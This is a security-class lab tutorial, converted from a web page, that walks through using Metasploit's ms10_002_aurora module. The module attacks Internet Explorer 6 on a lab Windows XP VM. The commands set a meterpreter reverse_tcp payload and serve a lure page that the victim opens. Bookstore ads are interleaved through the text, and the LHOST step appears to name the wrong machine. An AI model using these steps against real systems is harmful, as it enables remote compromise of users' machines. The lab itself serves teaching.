ComputerSecurityStudent (CSS)

HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US

|SECURITY TOOLS >> Metasploit |Views: 1333

(Metasploit windows/browser/ms10_002_aurora)
{ How To Crash Internet Exploder 6 }

Background Information
Metasploit Toolkit for
Reference Link: Penetration T...
David Maynor, Thom...
http://www.metasploit.com/modules/exploit/windows/browser/ms10_002_aurora Best Price $10.80
http://www.microsoft.com/technet/security/advisory/979352.mspx or Buy New $43.05

Privacy Information
Internet Explorer "Aurora" Memory Corruption
This module exploits a memory corruption flaw in Internet Explorer. This
flaw was found in the wild and was a key component of the "Operation Aurora"
attacks that lead to the compromise of a number of high profile companies.
The exploit code is a direct port of the public sample published to the
Wepawet malware analysis site. The technique used by this module is
currently identical to the public sample, as such, only Internet Explorer 6
can be reliably exploited.

Prerequisite
1. Login to your Instructor VM, as username administrator
For those of you that do not have access to my class, Instructor VM is a
Windows XP Operating System.

2. Download Metasploit
http://www.metasploit.com/download/

Penetration Tester's
Open Source Too...
3. Login to your WindowsVulnerable01 VM, as username student Jeremy Faircloth, ...
Best Price $21.00
For those of you that do not have access to my class, Instructor VM is a or Buy New
Windows XP Operating System running Windows Explor[d]er 6.
Privacy Information

4. On WindowsVulnerable01, discover your IP Address

Start --> Run --> cmd --> ipconfig

Writing Security Tools

and Exploits
James C. Foster, V...
Best Price $7.18
or Buy New $46.50

Privacy Information

Section 1: Fire Up Metasploit Console

1. On the Instructor VM, go to All Programs --> Metasploit Framework --> Metasploit
Console

converted by Web2PDFConvert.com
 Dissecting the Hack
Jayson E. Street, ...
Best Price $14.50
or Buy New $18.78

Privacy Information

SSH, The Secure Shell

2. NOTE: The Metasploit Console might take some time to load Daniel J. Barrett,...
When you see the below window then you know you will be ready. Best Price $16.96
or Buy New $27.26

Privacy Information

Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77

Privacy Information

Section 2: Searching for windows/browser/ms10_002_aurora

1. search aurora
The above command will show all exploits related to aurora. Implementing SSH
Himanshu Dwivedi
Best Price $0.01
or Buy New $35.00

Privacy Information

UNIX Shells by Example

2. use exploit/windows/browser/ms10_002_aurora Ellie Quigley
This command will tell msf which exploit to load. Best Price $22.88
or Buy New $35.78
NOTE: Your command prompt will change.

Privacy Information

Section 3: Setting the payload

1. show payloads

The payload is the actual code that will run on the target system after a
successful exploit attempt. Use the show payloads command to list all
payloads compatible with the current exploit. A Practical Guide to
Linux Commands,...

converted by Web2PDFConvert.com
 Mark G. Sobell
Best Price $16.74
or Buy New

Privacy Information

Linux Pocket Guide

Daniel J. Barrett
2. set PAYLOAD windows/meterpreter/reverse_tcp Best Price $0.90
or Buy New

Privacy Information

Section 4: Set Target IP Address and Exploit

1. set LHOST 192.168.1.108
Where 192.168.1.108 is the IP address of WindowsVulnerable01. Please refer
to step 4 in the prerequisite section to obtain the IP address of
WindowsVulnerable01. Linux Administration
Wale Soyinka
Best Price $11.78
or Buy New $19.99

Privacy Information

2. set URIPATH exploitME.html

This will be the name of the webpage file the mis-informed user with Windows
Exploder 6 will click on.

Beginning Ubuntu Linux

Keir Thomas, Andy ...
3. exploit Best Price $6.99
Notice how msf starts up a daemon listening on port 8080 for the victim to or Buy New $29.19
make a connection by click on the web address
http://192.168.1.105:8080/exploitME.html
NOTE: 192.168.1.105 is the IP address of the Instructor VM Privacy Information

Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
4. On WindowsVulnerable01, Bring up Windows Explorer 6 Best Price $2.11
or Buy New

Privacy Information
5. Place website address http://192.168.1.105:8080/exploitME.html in the address
bar.
Click Go or press enter in the address text box in which your address is
located.

converted by Web2PDFConvert.com
 Beginning the Linux
Command Line
Sander van Vugt
Best Price $18.89
or Buy New $23.30

6. On the Instructor VM Privacy Information

Once the browser tries to load the page, you will see a msf message saying
'Sending Internet Explorer "Aurora" Memory Corruption to client
192.168.1.108.'

Unix and Linux System

Administration...
7. Back to the WindowsVulnerable VM Evi Nemeth, Garth ...
After your Windows Exploder tries to load the web page it will become un-
Buy New
stable, crash, and you will see the below Microsoft Message.
Privacy Information

Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41

Privacy Information

Proof of Lab
Solaris Operating
1. Cut and Paste a screen shot that looks similar to Step #6 in Section 4 into a Environment Boot C...
David Rhodes, Domi...
word document and upload to Moodle. Best Price $0.74
or Buy New

Privacy Information

AIX 5L Administration
Randal K. Michael
Best Price $15.20
or Buy New $36.22

Privacy Information

converted by Web2PDFConvert.com
 AIX for UNIX
Professionals
Bonnie L. Miller
Best Price $5.62
or Buy New $58.00

Privacy Information

HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52

Privacy Information

HP-UX 11i Version 2

System Administr...
Marty Poniatowski
Best Price $5.36
or Buy New $38.53

Privacy Information

BSD UNIX Toolbox

Christopher Negus,...

Buy New

Privacy Information

converted by Web2PDFConvert.com